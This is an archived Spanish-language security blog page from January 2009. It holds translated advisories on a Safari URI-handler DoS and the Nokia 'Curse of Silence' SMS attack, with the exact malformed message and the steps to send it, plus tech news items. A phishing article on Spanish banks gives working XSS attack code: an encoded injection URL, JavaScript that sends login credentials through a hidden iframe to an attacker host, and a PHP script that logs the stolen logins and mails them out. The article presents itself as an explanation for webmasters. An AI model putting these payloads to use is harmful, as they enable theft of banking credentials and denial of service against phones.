Archivo para 31 enero 2009

Safari 3.2.1 for Windows SafariURL protocol Handler abusse(null Deference)

Traducción; climbo

##############################################
Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
Vendedor: http://www.apple.com
Aviso original: http://lostmon.blogspot.com/2009/01/
safari-321-for-windows-safariurl.html
Notificado al vendedor: SÍ Exploit disponible: Privado
##############################################

Este artículo es la segunda parte de:
https://climbo.wordpress.com/2009/01/28/safari-for-windows-321-remote-http-uri-handler-dos/

Safari (Windows) tiene propensas vulnerabilidades a una diferenciación de indicador nula en tratantes de protocolos HTTP, ftp y SafariURL.

Este bug es provocado cuando un usuario clicka un link malformado utilizando URI que causa indicador NULO de referencia en safari, siendo así; esto causará la pérdida de disponibilidad del  navegador.

En el caso de SafariURL es muy curioso, porque podemos crear una url malformada:  SafariURL://http://../ o ftp://../ y comprobarán que intenta abrirlo con Safari, Safari abre una ventana nueva, tratamos de cerrar esta ventana nueva haciendo click en la “X” y se cierra, pero se reabre nuevamente.

La cuestión ahora es: ¿por qué se abre de nuevo en un bucle infinito? podéis echadle un vistazo al código fuente de la función.

En cualquier lugar del código antes de utilizar un indicador, comprobad que no sea igual a NULL:

######################
Parte del código afectada
######################

CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR(“com.apple.Safari”), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@”Unable to locate Safari”, @”Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.”);
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
CFRelease(safariURL);
return safariBundle; }

#######################################

PoC simple; Safari_httpDoSPoC.pl

No sé si tiene la ejecución remota de código o otro tipo, se hicieron varias pruebas, y sólo puede provocar un DoS, no sé si se podría cambiar NSBundle…

Esta cuestión con SafariURL se puede explotar también a través de otros navegadores, simplemente hay que abrir el vínculo anterior expuesto con otros navegadores y ejecutarlo así: safari.exe-url [enlace]

Thnx To estrella to be my ligth
Thnx to all Lostmon Team.


atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

thz Lostmon 🙂

Anuncios

Safari for Windows 3.2.1 Remote http: URI handler DoS

Un nombre de dominio “mal formado” HTTP, puede causar en el navegador Safari un bucle infinito, si tratamos de resolver este dominio puede causar en la memoria una violación del acceso, a su vez; escribe una sección que contiene datos desconocidos.

Mirad el código donde lo demuestra: Safari_httpDoSPoC.pl

AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe
ModVer: 3.525.27.1 Offset: 00089394

safari_excepcion

Thnx To estrella to be my ligth
Thnx to all who belive in me…


atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

La curiosidad es lo que hace mover la mente….

thz Lostmon 🙂

FilterBit; escanea online archivos sospechosos de tener posibles virus

filterbit

Los usuarios que nos pasamos horas al día conectados, no debemos de bajar la guardia ante los problemas que se nos pueden presentar. Filterbit es otra solución online que nos permite verificar si cualquier archivo del que tengamos sospechas es realmente un archivo que compromete la seguridad de nuestro sistema.

Su funcionamiento es igual de sencillo que otras aplicaciones similares. Basta con que seleccionemos un archivo, teniendo en cuenta que no debe de pasar los 20 MB de peso máximo, para subirlo, con lo que entonces serán ocho motores de antivirus online quienes se encarguen de analizarlo.

Finalmente recibiremos un informe, en el cual se nos informará si realmente es un virus o no, además de otros datos, como el tiempo en el que ha sido escaneado o la información propia del archivo.

A tener en cuenta, como NoVirusThanks, VirSCAN, o Virus Total, entre tantos otros.

URL: Filterbit

Fuente: Genbeta.

Si eres legal no te entrarán virus en el procesador

p2p Enternecedor el testimonio ganador de mes de diciembre en la web de la campaña “si eres legal eres legal“. Se trata de un pobre y desvalido niño que, llevado por los malos consejos de las mafias del patio de recreo de su colegio, se bajo algo de Internet. Como es natural todos los virus del universo fueron a por esta alma cándida, se instalaron en su microprocesador y no hubo más remedio que tirar el ordenador entero.

Que el que quienes quieren darnos lecciones de los peligros de la piratería no sepan diferenciar un HDD o una BIOS de un microprocesador no tiene nada de raro, en todos los países los que legislan no tienen, habitualmente, ni idea práctica del tema que se traen entre manos, pero que ese gazapo se le cuele a sus colaboradores, los profesionales contratados para editar y mantener la página web, ya es más llamativo.

La cosa empieza a tomar tintes de bochorno cuando sale a la luz que ese post es intencionado, para comprobar los conocimientos de estos señores y para poner a prueba los filtros de esa web. El tetimonio en cuestión se coció en un hilo de Forocoches y tres cuartas partes de los internautas españoles sabían, antes de que se enviara, que se trataba, no solo de un imposible técnico, sino que también de una broma.

Y estos señores, que saben tanto de los peligros de las nuevas tecnologías que nos quieren concienciar, compartiendo su saber con nosotros, lo publican y encima lo premian. Quizás si sus intenciones no fueran exagerar hasta el histrionismo y diferenciaran entre condenable piratería, que sí que hay mafias organizadas dedicadas a eso y donde menos venden es en la Red, y derechos a intercambio y copia privada a nivel de usuario, les iría algo mejor.

En contraposición nos encontramos con el comunicado de la Asociación de Internautas, donde sí que saben de lo que hablan: el desarrollo pleno de la sociedad de la información en España pasa por incluir la banda ancha en el Servicio Universal y por abaratar precios, estableciendo un tope máximo y liberalizando el mercado por debajo él.

Fuente: ADSLAyuda.

Vulnerabilidad en teléfonos Nokia con un simple SMS

En el último congreso de la CCC (Chaos Computer Club) se ha publicó una vulnerabilidad que afecta a teléfonos móviles NOKIA que consta de bloquear los envíos y recibos de SMS (mensajes de texto) o MMS (mensajes multimedia).

forsymbianos_logo1_300

La vulnerabilidad consiste en enviar un SMS (mensaje de texto) con un formato específico a un teléfono móvil que use el Sistema Operativo Symbian S60, usado por la mayoría de móviles Nokia, cabe destacar que también tienen este SO algunos Panasonic y Samsung.

Estos son los móviles afectados:

S60 3rd Edition, Feature Pack 1 (S60 3.1):

Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E51
Nokia N95 8GB
Nokia N95
Nokia N82
Nokia N81 8GB
Nokia N81
Nokia N76
Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):

Nokia E70
Nokia E65
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):

Nokia N90
Nokia N72
Nokia N70
S60 2nd Edition, Feature Pack 2 (S60 2.6):

Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630

Después de mandar este SMS, el destinatario no podrá recibir ni enviar SMS y MMS; esta técnica se hace llamar: “Curse Of Silence” por si queréis buscar más información sobre ello.

El SMS en formato email es el siguiente:
123456789@123456789.1234567890123 <= (incluyendo un espacio final)

A continuación os diré como mandar un SMS en formato email;

Si por casualidad esto te ha pasado y tienes bloqueado tu teléfono, simplemente te servirá con instalar el CurseSMS en tu móvil; es una herramienta gratuita que te permite desbloquear tu teléfono del ataque “Curse of Silence” sin necesidad de hacer un “Hard Reset” (ya que perderíamos la configuración del teléfono).

1. Abres el editor de SMS
2. “Opciones”
3. “Opciones de envió”
4. “Mensaje enviado como”
5. “Correo”

+info:

http://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt

Descarga de CurseSMS:

1. (S60 Symbian 7/8): http://www.fortiguardcenter.com/mobile/cleanup/FortiCleanUp_CurseSMS_103.sis

2. (S60 Symbian 9): http://www.fortiguardcenter.com/mobile/cleanup/FortiCleanup_CurseSMS_v_1_0_3_signed.sis

La banca española ante el phishing

##########################################
La banca española ante el phishing
##########################################

Despues del aumento reciente de los casos de phishing sobre
entidades Bancarias españolas, he realizado un pequeño estudio
sobre el estado de esas entidades, de cara al phishing.

Entendemos por phishing , el envio de correos fraudulentos
suplantando la identidad de una entidad bancaria, en el cual se
nos avisa de algun fallo de seguridad u otra informacion, y se
nos insta a visitar una url falsa de la entidad (normalmente
camuflan la direccion real),y una vez visitada, se nos pedira
seguramente , nuestras credenciales para acceder,y de hacerlo,
normalmente esas webs estan preparadas para capturar nuestros
datos de acceso.

Todo esto esta bastante bien explicado aqui :
http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx

Una vez entendido el concepto de phishing, podemos pensar,que
hay que ser muy tonto, para visitar una web que no es la original
del banco y meter , nuestras credenciales.

Normalmente es asi , pero que ocurre si esa url desde donde se
lleva a cabo el ataque de phishing es realmente la original del banco?

En una mirada asi por encima se han detectado once entidades
españolas tanto cajas como bancos afectados.

Si desea saber si su entidad esta afectada, mandeme un mail
y gustosamente le informaremos de si esta usted en el listado
y de estar en el , le serian reportadas las vulnerabilidades
encontradas y su posible solucion o mitigacion.

De todas maneras todas las entidades afectadas,recibiran un mail
avisandoles de esta situacion( a algunas ya se le ha enviado).

Pero esto es irse por las ramas y no destapar el meollo de la
cuestion.. XDDDD

Asi pues si ponemos por caso que la mayoria de web corporativas
de entidades bancarias y financieras son vulnerables a ataques de
tipo XSS o CSRF(links a la wiki), esto aumenta la posibilidad de
realizar ataques de phishing sobre la misma web del banco y hacer
asi mas creibles para los usuarios incautos el engaño.

Como puede un atacante que haya encontrado un agujero de ese
tipo llevar a cabo con exito ese ataque?

Lo expuesto acontinuacion esta escrito a titulo de muestra o
ejemplo no me hago responsable del uso que le puedan dar
usuarios malintencionados.

Esto esta mas bien expuesto como ejemplo para administradores
y webmasters a titulo explicativo de como un atacante puede
realizar este tipo de ataques sobre la misma web y hacer asi
mas creible el engaño.
Un server (seguramente comprometido) para recojer los datos y
hostear los archivos necesarios para el phishing (javascripts).
Algun servidor SMTP con el relay abierto y sin autentificacion
Por si queremos hacer uso de funciones de mail()

En un banco, en la web de autentificacion , normalmente
encontramos un formulario en el cual se nos piden los datos
para poder acceder al manejo de cuentas y demas.

Un ejemplo de formulario podria ser similar a este:

====================

====================
[..]

User:

Pass:

[..]

si observamos el codigo vemos varios elementos:

– Hay un formulario de acceso llamado “loginusuarios”
– El usuario de texto será “loginusuarios.usuari”
– El paso de texto será “loginusuarios.pass”

Por lo tanto,podriamos crear un java a medida para el sitio
para que añadiera un iframe oculto al cuerpo del documento por
medio de xss y obtener asi los datos introducidos.

Un ejemplo podria ser este:

http://%5BEntidad_victima%5D/login.php?variable_vulnerable=
“>

o en alguna de sus codificaciones para disimularlo aun mas:

http://%5BEntidad Victima]/login.php?variable_vulnerable=%22%3E
%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%
5B%41%74%74%61%63%6B%65%72%5D%2F%70%68%69%73%68%69%6E%67%2E%

6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E

El javascript, se ejecutaria en el contexto de seguridad entre
el server, y el navegador del usuario lejitimo de la web.

====================
/* phishing.js */
===================

//Ponemos el nombre del formulario
Form = document.forms[“loginusuarios”];

function OcultarLogin() {
// Creamos un nuevo iframe.
var iframe = document.createElement(“iframe”);

// Forzamos al iframe a que este escondido
iframe.style.display = “none”;

// Cargamos el codigo malicioso en el iframe.
iframe.src = “http://%5Batacante%5D/pilla_login.php?user=&#8221;
+ Form.usuari.value + “&pass=” + Form.pass.value;

// Añadimos el iframe en el cuerpo del documento
document.body.appendChild(iframe);
}
// Cuando el usuario clica en enviar, se nos envia esa inf.
Form.onsubmit = OcultarLogin();

/* EOF */
==========================

Despues necesitamos que esos datos sean recojidos, y para
ello necesitaremos un server donde llevar los POST y un
archivo hosteado preparado para recibirlos y guardarlos o
enviarlos por mail ,como queramos.

====================
/* pilla_login.php */
====================

if(isset($_GET[‘user’]) && isset($_GET[‘pass’])) {
// Establece el path y abre el archivo logins.txt
$file_path = “logins.txt”;
$file = @fopen($file_path, “a”);
// genera la cadena
$string = “User: “. $_GET[‘user’] .” and Pass: “. $_GET[‘pass’] . “\n”;
// Escribe la cadena y cierra el archivo.
@fwrite($file, $string);
@fclose($file);
}

// si ademas queremos enviar los datos capturados por mail =>
// mail(“atacante@atacante.es”,”Otro Pardillo pico”,”$string”);
?>
/* EOF */
=================================

Con lo cual un agujero bien simple como puede ser un
XSS puede convertirse en un ataque sofisticado para
realizar un phishing directo a una entidad Bancaria.

Aun podriamos rizar mas el rizo:

Suponiendo que el usuario victima ,no visite la web, o que
cliquee en otro lado y vaya a otra pagina diferente de donde
se encuentra el formulario de login,podriamos “forzarlo” a
ir a la pagina delogin primero,y antes de que realice ninguna
accion, deba introducir primero los datos de login , para
poder acceder.

Esto seria tambien aun mas creible ya que estariamos efectuando
el phishing directamente desde la web de la entidad y ademas
obligamos al user a hacer login con su propio formulario
de login.

Si modificamos el javascript anterior para que haga lo mismo;
pero que ademas fuerce al usuario,creariamos un segundo iframe.
en un iframe cargaremos el codigo malicioso , y en el otro
cargariamos el formulario de login de la web:

=================================
/* phishing2.js */

Form = document.forms[“loginusuarios”];
function forzarLogin() {
var loginiframe = document.createElement(“iframe”);
var loginiframe.src = “http://%5BEntidad-victima%5D/login.php&#8221;;
document.body.appendChild(loginiframe);
}
function OcultarLogin() {
var iframe = document.createElement(“iframe”);
iframe.style.display = “none”;
iframe.src = “http://%5BAtacante%5D/pilla_login.php?user=&#8221;
+ Form.usuari.value + “&pass=” + Form.pass.value;
document.body.appendChild(iframe);
}
window.onload = forzarLogin();
Form.onsubmit = OcultarLogin();

/* EOF */
====================================

Aunque todo lo aqui expuesto es un burdo ejemplo,creo que
queda bien reflejado el alcance y que el resultado, es obvio,
aunque en muchos contratos de banca online , se “firma” que
el usuario no hara un mal uso de las credenciales suministradas
…etc.

Ante un ataque real de phishing…el usuario victima,ni se
habra enterado de lo que ha pasado , ya que en si ha sido
el el que legalmente ha introducido sus credenciales en la
web de la entidad y ha sido desde la web misma de la entidad
desde donde han sido robadas esas claves.

Seguramente los webmasters y programadores de los sitios web
de estas caracteristicas, deberian fijarse mas en este tipo
de agujeros a los cuales no se les da mucha importancia.

Muchas veces , Contratan servicios o sistemas ya prediseñados
como pueden ser alguno de los portales de oracle o algun tipo
de CMS como Vignette CMS;Pero ¿No son resposables los equipos
de seguridad logica que poseen las entidades o que subcontratan?
No deberian esos equipos estar al dia en vulnerabilidades sobre
sus sistemas??

La primera medida para poder luchar contra la plaga que
es el phishing deberia ser mantener nuestros sitios libres
de agujeros o al menos revisarlos y no sacar al mercado ,
nada que no haya sido antees testeado a fondo, Pues es
nuestro dinero con el que en se juega.

Despues de este estudio, dire, que me he quedado muy
decepcionado de lo que es la banca online española,
actualmente, son bastantes las entidades que podrian
estar afectadas.

Los usuarios podrian prevenir estas situaciones usando por
ejemplo Internet explorer 8 que lleva un filtro antiXSS,
aunque personalmente me fio mas de la barra de netcraft,
ademas de que puede ser usada en explorer y en firefox
http://toolbar.netcraft.com/

###############################
Enlaces Relacionados y fuentes:
###############################

http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial
http://www.antiphishing.org
http://www.playhack.net/papers/
http://www.microsoft.com/spain/empresas/legal/phishing.mspx
http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx
http://seguridad.internautas.org/html/4428.html

atentamente:
Lostmon (Lostmon@gmail.com)

—-

thz Lostmon 🙂

+info: http://lostmon.blogspot.com/

En lugar de la desconexión, la SGAE plantea una reducción de velocidad a quien use P2P

Las sociedades de gestión de derechos de autor y la industria audiovisual han propuesto a los operadores que limiten la velocidad a los usuarios que descarguen en redes de intercambio en lugar de desconectarlos como sucede en Francia. Según fuentes consultadas por ADSLzone.net, al menos uno de los operadores de banda ancha más representativos aceptaría esta propuesta.

newemule

A mediados de diciembre, el ministro de Cultura, César Antonio Molina, anunció medidas antipopulares para luchar contra la piratería en Internet y encima de la mesa hay varias propuestas. Implantar el sistema de avisos que informa a los usuarios que descargan que están cometiendo un acto ilegal y reducir la velocidad de la conexión a Internet a quien reincide.

Según un estudio, el 70 por ciento de los internautas británicos que han recibido una advertencia de su operador han dejado de descargar en redes de intercambio P2P. De hecho, el informe indica que además aumentó la venta de contenidos legales en la red. En España podría suceder lo mismo, pero para casos más extremos los operadores podrían reducir drásticamente la velocidad de la conexión.

Se evitan las desconexiones

En Francia, un usuario que descarga contenidos en redes P2P puede acabar sin conexión a Internet. Lo que propone la industria audiovisual es limitar la velocidad, igual que sucede en banda ancha móvil cuando un cliente sobrepasa un límite de tráfico y automáticamente su velocidad se limita a 128 Kbps.

Algunos operadores aplaudirían esta medida porque no supone gastos adicionales y además permite ahorrar tráfico y por tanto costes, sin embargo abriría las puertas a estrategias comerciales de otros operadores para arañar cuota de mercado ofreciendo velocidades de subida mayores.

Con toda seguridad, esta propuesta sea una de las medidas antipopulares que anunció industria. El Periodico.com también lo comenta.

Fuente: ADSLZone.


Blog Stats

  • 612,704 visitas

RSS

Feed
enero 2009
L M X J V S D
« Dic   Feb »
 1234
567891011
12131415161718
19202122232425
262728293031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker